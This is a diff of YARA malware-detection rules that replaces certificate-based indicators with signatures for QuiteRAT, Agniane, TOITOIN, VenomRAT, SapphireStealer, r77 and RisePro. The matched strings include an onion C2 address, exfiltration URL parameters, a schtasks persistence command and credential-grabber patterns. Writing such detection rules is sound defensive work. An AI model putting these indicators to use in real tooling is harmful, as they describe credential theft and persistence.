-		modified = "2024-10-04"
+		id = "19b0f327-06ee-5f78-abac-9c4fbcad98ac"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4565-L4576"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11032-L11052"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f074e141e07cbf6b5b4726b52faa382b8ece809804dcfb9d45a5b2450125b5b7"
+		logic_hash = "58df9f47f5890c5e31d352be682c6164a940dad206ad29c54c43f70d3afb9543"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ff481ea6a887f3b5b941ff7d99a6cdf90c814c40"
-		importance = 20
+
+	strings:
+		$s1 = "WLANSVC" fullword wide
+		$s2 = "f02fe1c0-137a-4802-8881-55dd300c5022" fullword wide
+		$s3 = "\\wlan.lnk" fullword wide
+		$s4 = "str-12.bin" wide
+		$s5 = "/geolocation/v1/geolocate?key=" wide
+		$s6 = "/wlan" fullword wide
+		$s7 = "/scanned" fullword wide
+		$s8 = "/bots/" fullword wide
+		$s9 = "wlan.pdb" fullword ascii
+		$s10 = "botId" fullword ascii
+		$s11 = "wifiAccessPoints" fullword ascii
+		$s12 = "considerIp" fullword ascii
+		$s13 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bandicam Company" and pe.signatures [ i ] . serial == "3f:8d:23:c1:36:ae:9c:be:ea:c7:60:5b:24:ec:03:91" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3972443Af922B751D7D36C10Dd313595 : FILE
+rule DITEKSHEN_MALWARE_Win_Quiterat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects QuiteRAT"
 		author = "ditekSHen"
-		id = "21ada866-167a-54d5-a137-7720de32520e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "54f7b899-3418-5074-8138-38cf073cda8c"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4578-L4589"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11054-L11068"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "764d0a288edd3bac90c0b93319f4f8ff8a7d567cda42aa52fe6114f4e56216ad"
+		logic_hash = "257f9151294254e3e86979f184963f0396587438393b11bad068ba0f386cfc4a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d89e3bd43d5d909b47a18977aa9d5ce36cee184c"
-		importance = 20
+
+	strings:
+		$x1 = "< No Pineapple! >" ascii
+		$x2 = ".?AVPineapple" ascii
+		$x3 = ".?AVApple@@" ascii
+		$s1 = "XgsdCwsRFxZF" ascii
+		$s2 = "XggZChkVRQ==" ascii
+		$s3 = "RxUZERQRHEU=" ascii
+		$s4 = "XhkbDBEXFkU" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sore Loser Games ApS" and pe.signatures [ i ] . serial == "39:72:44:3a:f9:22:b7:51:d7:d3:6c:10:dd:31:35:95" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $x* ) and 1 of ( $s* ) ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_37F3384B16D4Eef0A9B3344B50F1D8A3 : FILE
+rule DITEKSHEN_MALWARE_PWSH_CUMII
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects multi-dropper PowerShell"
 		author = "ditekSHen"
-		id = "a7eef803-2c9e-5f23-acde-22ae2223fec2"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "07b77251-1d79-5521-8c05-ecfc662f45cb"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4591-L4602"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11070-L11086"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4496052ff9677e0d031471e4ae9b3541099a2dbe024b4b5ba3f757800bfdcb07"
+		logic_hash = "ab9e59b0552718928d170a988d129b38352700076847f2f409976016858864eb"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "3fcdcf15c35ef74dc48e1573ad1170b11a623b40"
-		importance = 20
+		tags = ""
+		clamav = "ditekSHen.MALWARE.PWSH.CUMII"
+
+	strings:
+		$s1 = ".('{1}{$}'.replace('$','0')" ascii nocase
+		$s2 = ",'I').replace('!','ex')" ascii nocase
+		$s3 = "'.replace('*','0001')" ascii nocase
+		$s4 = "Remove-Item $" ascii nocase
+		$s5 = "the File will start cumiing" ascii nocase
+		$b1 = "011001100111010101101110011*" ascii
+		$b2 = "0101001000*1110110*010011111" ascii
+		$b3 = "01001101010110101001*11*0000" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sore Loser Games ApS" and pe.signatures [ i ] . serial == "37:f3:38:4b:16:d4:ee:f0:a9:b3:34:4b:50:f1:d8:a3" )
+		(3 of ( $s* ) and 1 of ( $b* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00B3969Cd6B2F913Acc99C3F61Fc14852F : FILE
+rule DITEKSHEN_MALWARE_Win_Agnianestealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Agniane infostealer"
 		author = "ditekSHen"
-		id = "2cd4cee3-0adc-595f-b86f-7c515cd0ea64"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "fcbbf748-dc01-579f-a6f8-37e0f3dea35e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4604-L4619"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11088-L11114"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4ee7f3da2ae707517c1c426e6a73fdede51514e4ddf60b93fd77c1b6c23e82c0"
+		logic_hash = "0031fbe6d76868819cbcfc638433d60a50e8f5cfd14ff25af88ed3dffefd7d62"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "bd9cadcfb5cde90f493a92e43f49bf99db177724"
-		hash1 = "a4d9cf67d111b79da9cb4b366400fc3ba1d5f41f71d48ca9c8bb101cb4596327"
-		importance = 20
+		snort = "923828001"
+		clamav = "ditekSHen.MALWARE.Win.AgnianeStealer"
+
+	strings:
+		$x1 = "Agniane.pdb" ascii
+		$x2 = "IEnumerable<Agniane.Classes.LogRecord>." ascii
+		$x3 = "Agniane Stealer" wide
+		$x4 = "cinoshibot" wide
+		$x5 = "yqbiguuno2zp5jxsmqbev4rwckvy27bqws5cgm3hiid7xolt65j72kqd.onion" wide
+		$s1 = "<Pass encoding=\"base64\">" wide
+		$s2 = "Domain Detect: detected {0}" wide
+		$s3 = "DOMAINDETECTCOOKIES" ascii
+		$s4 = /(Opera|Edge|Chrome|Brave|Vivaldi|Blink|Universal|Gecko|OperaGx|Firefox)Grabber/ fullword ascii
+		$u1 = "/antivm.php?id=" wide
+		$u2 = "/ferr.php?id=" wide
+		$u3 = ".php?ownerid=" wide
+		$u4 = "&buildid=" wide
+		$u5 = "&username=" wide
+		$u6 = "&BSSID=" wide
+		$u7 = "&rndtoken=" wide
+		$u8 = "&domaindetects=" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S.O.M GmbH" and ( pe.signatures [ i ] . serial == "b3:96:9c:d6:b2:f9:13:ac:c9:9c:3f:61:fc:14:85:2f" or pe.signatures [ i ] . serial == "00:b3:96:9c:d6:b2:f9:13:ac:c9:9c:3f:61:fc:14:85:2f" ) )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 3 of ( $u* ) ) ) or ( all of ( $s* ) and 3 of ( $u* ) ) or ( 7 of ( $u* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0D83E7F47189Cdbfc7Fa3E5F58882329 : FILE
+rule DITEKSHEN_MALWARE_Win_TOITOIN_Kritaloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects TOITOIN KritaLoader"
 		author = "ditekSHen"
-		id = "6574aab4-f307-53c2-8cf7-bcc7565facc8"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "5ff002fc-1108-554e-9de6-92d568826d1d"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4621-L4632"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11116-L11127"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c4dffcad286e161980ccec2188459b8b7eaf0e982c7c69ca5ffbaf8e4d85d1b4"
+		logic_hash = "9629a4cfa606812d2579c0c0d486dec5971854e5133f0594a4638db5b89c3135"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ba4bf6d8caac468c92dd7cd4303cbdb2c9f58886"
-		importance = 20
+		clamav = "ditekSHen.MALWARE.Win.Trojan.TOITOIN"
+
+	strings:
+		$p1 = ":\\Trabalho_2023\\OFF_2023\\" ascii
+		$p2 = "DLL_Start_OK.pdb" ascii
+		$s1 = "krita_main" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "0d:83:e7:f4:71:89:cd:bf:c7:fa:3e:5f:58:88:23:29" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $p* ) and 1 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_008385684419Ab26A3F2640B1496E1Fe94 : FILE
+rule DITEKSHEN_MALWARE_Win_TOITOIN_Injectordll : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects TOITOIN InjectorDLL"
 		author = "ditekSHen"
-		id = "5aa92ac6-241f-54a1-b828-f8a5deb6d212"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "40776e0a-29df-52ea-8486-35027ab31a1b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4634-L4645"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11129-L11141"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7c9de438d5c7156052e30ce70310aaa989ff1896f7b34ffc6c4fd8fc2bc60b85"
+		logic_hash = "fc80c702305657ba1058ca7f55579d1d5254dd0f619c5f7fda7886a868b65c93"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "ee1d7d90957f3f2ccfcc069f5615a5bafdac322f"
-		importance = 20
+		clamav = "ditekSHen.MALWARE.Win.Trojan.TOITOIN"
+
+	strings:
+		$p1 = ":\\Trabalho_2023\\OFF_2023\\" ascii
+		$p2 = "DLL_START_IN.pdb" ascii
+		$s1 = ".ini" fullword ascii
+		$s2 = "\\users\\Public\\Documents\\" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAUSE FOR CHANGE LTD" and pe.signatures [ i ] . serial == "00:83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $p* ) and all of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1Aec3D3F752A38617C1D7A677D0B5591 : FILE
+rule DITEKSHEN_MALWARE_Win_TOITOIN_Downloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects TOITOIN Downloader"
 		author = "ditekSHen"
-		id = "8e1bb307-733c-5626-98f6-a5c2587bf800"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "0282ea26-e381-5c9a-9dad-c90246d8add0"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4647-L4658"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11143-L11154"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4bbe5aac8a470061abab48070fafd2100c577cab1f40fcc5924dbd13bc747487"
+		logic_hash = "d7e5e99c9266ec144152c3d1066e0e1a862f48ded17fab8f504192ca48219826"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1d41b9f7714f221d76592e403d2fbb0f0310e697"
-		importance = 20
+		clamav = "ditekSHen.MALWARE.Win.Trojan.TOITOIN"
+
+	strings:
+		$p1 = ":\\Trabalho_2023\\OFF_2023\\" ascii
+		$s1 = { 20 2f 63 20 22 [6-15] 63 00 6d 00 64 00 00 00 6f 00 70 00 65 00 6e }
+		$o1 = { 48 83 fa 10 72 34 48 8b 8d 10 ?? 00 00 48 ff c2 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SILVER d.o.o." and pe.signatures [ i ] . serial == "1a:ec:3d:3f:75:2a:38:61:7c:1d:7a:67:7d:0b:55:91" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_E5B2Af04Ea4B84A94609A47Eba3164Ec : FILE
+rule DITEKSHEN_MALWARE_Win_Venomrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects VenomRAT"
 		author = "ditekSHen"
-		id = "ea78ae13-cd9f-578a-95e4-906ab7045faf"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "93cd5ae3-c222-51a2-bbb9-bdd3254006e5"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4660-L4671"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11156-L11170"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2e32bb0d9689625cd860a75539961410241de341ad4b7ee661df7d3b2dd47c46"
+		logic_hash = "47d343def76a323c66db4ba6fb1c0d119f45323f9b7f36695e4aeb7b070819d7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7785d50066faee71d1a463584c1a97f34431ddfe"
-		importance = 20
+
+	strings:
+		$x1 = "Venom RAT + HVNC" fullword ascii
+		$x2 = "Venom" fullword ascii
+		$x3 = "VenomByVenom" fullword wide
+		$s1 = "/c schtasks /create /f /sc onlogon /rl highest /tn \"" fullword wide
+		$s2 = "UmVjZWl2ZWQ" wide
+		$s3 = "Pac_ket" fullword wide
+		$s4 = "Po_ng" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RRGRQJRWZHRTLFAUVK" and pe.signatures [ i ] . serial == "e5:b2:af:04:ea:4b:84:a9:46:09:a4:7e:ba:31:64:ec" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 2 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Dummy01 : FILE
+rule DITEKSHEN_MALWARE_Win_Sapphirestealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SapphireStealer"
 		author = "ditekSHen"
-		id = "eaf3bbdd-72b4-513c-9a5b-04f16292fa00"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "ed6cffe4-23f1-5791-b07d-75abb698c899"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4673-L4687"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11172-L11190"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c72ac977ef92feead0a7ec72ec99b1a11f20b8c5258a08842a4dceddff91d659"
+		logic_hash = "97088c0decf158d45a02571bd50b5f370c139339c19b8071f38c0f9816232d1f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint1 = "16b7eb40b97149f49e8ec885b0a7fa7598f5a00f"
-		thumbprint2 = "902bf957b57f134619443d80cb8767250e034110"
-		thumbprint3 = "505f0055a66216c81420f41335ea7a4eb7b240fe"
-		thumbprint4 = "c05a6806d770dcec780e0477b83f068a1082be06"
-		importance = 20
+
+	strings:
+		$s1 = "Sapphire.Modules." ascii
+		$s2 = "sapphire\\" wide
+		$s3 = "by r3vengerx0" wide
+		$s4 = "Sapphire\\obj\\" ascii
+		$s5 = "[ERROR_GETSECRETKEY_METHOD]" fullword wide
+		$s6 = "[ERROR_CANT_GET_PASSWORD]" fullword wide
+		$s7 = "<h2>------NEW LOGS------</h2>" wide
+		$s8 = "[ERROR] can't create grab directory" wide
+		$s9 = "<UploadToTelegram>d__" ascii
+		$s10 = "UploadToTelegram" ascii
+		$s11 = ".SendLog+<UploadToTelegram>d__" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dummy certificate" and pe.signatures [ i ] . serial == "01" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00A7E1Dc5352C3852C5523030F57F2425C : FILE
+rule DITEKSHEN_MALWARE_Win_R77 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects r77 rootkit"
 		author = "ditekSHen"
-		id = "fba8f1a8-ca08-5d6f-a83e-c817daf94703"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "813d207e-c6d9-5fea-8387-19da33bc3317"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4689-L4700"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11192-L11217"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "06c151ae8b4a45eccef028ea69f0adf74445bd4d871fc65cc1d308f2005cede1"
+		logic_hash = "e3ec6e88a3a77b7dc69eb51a528e6417f6b8695c7cb01d699cf248cebd9b84e2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "09232474b95fc2cfb07137e1ada82de63ffe6fcd"
-		importance = 20
+
+	strings:
+		$s1 = "startup" fullword wide
+		$s2 = "process_names" fullword wide
+		$s3 = "paths" fullword wide
+		$s4 = "service_names" fullword wide
+		$s5 = "tcp_local" fullword wide
+		$s6 = "tcp_remote" fullword wide
+		$s7 = "\\\\.\\pipe\\" wide
+		$s8 = "SOFTWARE\\" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pushka LLC" and pe.signatures [ i ] . serial == "00:a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 5 of them and pe.exports ( "ReflectiveDllMain" ) ) or ( 5 of them and for any i in ( 0 .. pe.number_of_sections ) : ( ( pe.sections [ i ] . name == ".detourd" ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_635517466B67Bd4Bba805Bc67Ac3328C : FILE
+rule DITEKSHEN_MALWARE_Win_Disco_Nightclub : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Hunts for Disco NightClub"
 		author = "ditekSHen"
-		id = "b7533186-b5dc-53ce-912b-39bd42c92071"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "79cbd351-e5d9-5f1f-8e73-71e0acca2707"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4702-L4713"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11219-L11237"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "71cdb314e2f6bda70f9f627d72aea49290fdbce66f76a170aa6571873ca82860"
+		logic_hash = "ee0bd110ea1a3182284c4b3d6dd7eff48ca809a35a925147c716b18a88c0a233"
 		score = 75
-		quality = 75
+		quality = 51
 		tags = "FILE"
-		thumbprint = "0b3144ec936028cbf5292504ef2a75eea8eb6c1d"
-		importance = 20
+
+	strings:
+		$s1 = "\\OfficeBroker\\OfficeBroker.exe" ascii wide nocase
+		$s2 = "\\EDGEUPDATE\\EDGEAOUT" ascii wide nocase
+		$s3 = "\\EDGEUPDATE\\update" ascii wide nocase
+		$s4 = "windows.system.update.com" ascii wide nocase
+		$s5 = "edgeupdate-security-windows.com" ascii wide nocase
+		$s6 = "nightclub::" ascii wide nocase
+		$s7 = "EncryptedPasswordFlt" ascii wide nocase
+		$s8 = "Microsoft\\def\\Gfr45.cfg" ascii wide nocase
+		$s9 = "::keylog::" ascii wide nocase
+		$pdb1 = "\\AbcdMainProject\\Rootsrc\\Projects\\MainS\\Ink\\" ascii wide nocase
+		$pdb2 = "\\Autogen\\Kh\\AutogenAlg\\" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEDIATEK INC." and pe.signatures [ i ] . serial == "63:55:17:46:6b:67:bd:4b:ba:80:5b:c6:7a:c3:32:8c" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_A2253Aeb5B0Ff1Aecbfd412C18Ccf07A : FILE
+rule DITEKSHEN_MALWARE_Win_Risepro : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "82d70dae-97e7-5fa3-8a91-de6143fa2164"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects RisePro infostealer"
+		author = "ditekShen"
+		id = "77bc8791-cbe8-53b5-86f4-bc918454a6a6"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4729-L4740"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11239-L11269"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "357de1cbdf3223dfb1a920bfb15bbbd66906de5225c0ed015e5a3fbbbb65a753"
+		logic_hash = "f6f1832f316df51ca108a3c75034bd53c3823cd3d9b16da120e12e252dbf90ff"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		thumbprint = "b03db8e908dcf0e00a5a011ba82e673d91524816"
-		importance = 20
+
+	strings:
+		$x1 = "t.me/riseprosupport" ascii wide nocase
+		$s1 = "failed readpacket" fullword wide
+		$s2 = "faield sendpacket" fullword wide
+		$s3 = "PersistWal" fullword wide
+		$s4 = /CRED_ENUMERATE_(ALL|SESSION)_CREDENTIALS/ fullword ascii
+		$s5 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36" fullword wide
+		$s6 = { 4c 00 6f 00 67 00 69 00 6e 00 20 00 44 00 61 00
+                74 00 61 [10] 57 00 65 00 62 00 20 00 44 00 61 00
+                74 00 61 [2] 48 00 69 00 73 00 74 00 6f 00 72 00
+                79 [21] 43 00 6f 00 6f 00 6b 00 69 00 65 00 73 }
+		$s7 = { 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00
+                69 00 6f 00 6e 00 2f 00 78 00 2d 00 77 00 77 00
+                77 00 2d 00 66 00 6f 00 72 00 6d 00 2d 00 75 00
+                72 00 6c 00 65 00 6e 00 63 00 6f 00 64 00 65 00
+                64 00 3b 00 20 00 63 00 68 00 61 00 72 00 73 00
+                65 00 74 00 3d 00 75 00 74 00 66 00 2d 00 38 00
+                42 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74
+                00 69 00 6f 00 6e 00 2f 00 6a 00 73 00 6f 00 6e
+                00 2c 00 20 00 74 00 65 00 78 00 74 00 2f 00 70
+                00 6c 00 61 00 69 00 6e 00 2c 00 20 00 2a 00 2f
+                00 2a }
+		$s8 = /_(SET|GET)_(GRABBER|LOADER)/ wide
+		$s9 = /catch (save )?(windows cred|screen|pluginscrypto|historyCC|autofill|cookies|passwords|passwords sql|autofills sql|dwnlhistory sql|discordToken|quantum|isDropped)/ fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gallopers Software Solutions Limited" and pe.signatures [ i ] . serial == "a2:25:3a:eb:5b:0f:f1:ae:cb:fd:41:2c:18:cc:f0:7a" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 6 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_21E3Cae5B77C41528658Ada08509C392 : FILE
+rule DITEKSHEN_MALWARE_Win_Graphicalproton_Rsockstun : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "bd97478f-1b75-542d-814c-8d318d745240"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects GraphicalProton custom rsockstun"
+		author = "ditekShen"
+		id = "5efa85f6-7e73-53a1-92df-4cb975e62345"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4742-L4753"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11271-L11286"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c860e888b19b98c40cf00babfb022a79a35f12def0077733e796b2aeeea324ea"
+		logic_hash = "ca4d18160b89d82106310237cf81bba57a7f51be77a31d2f18ca8c2987972c2c"
 		score = 75
 		quality = 75
 		tags = "FILE"
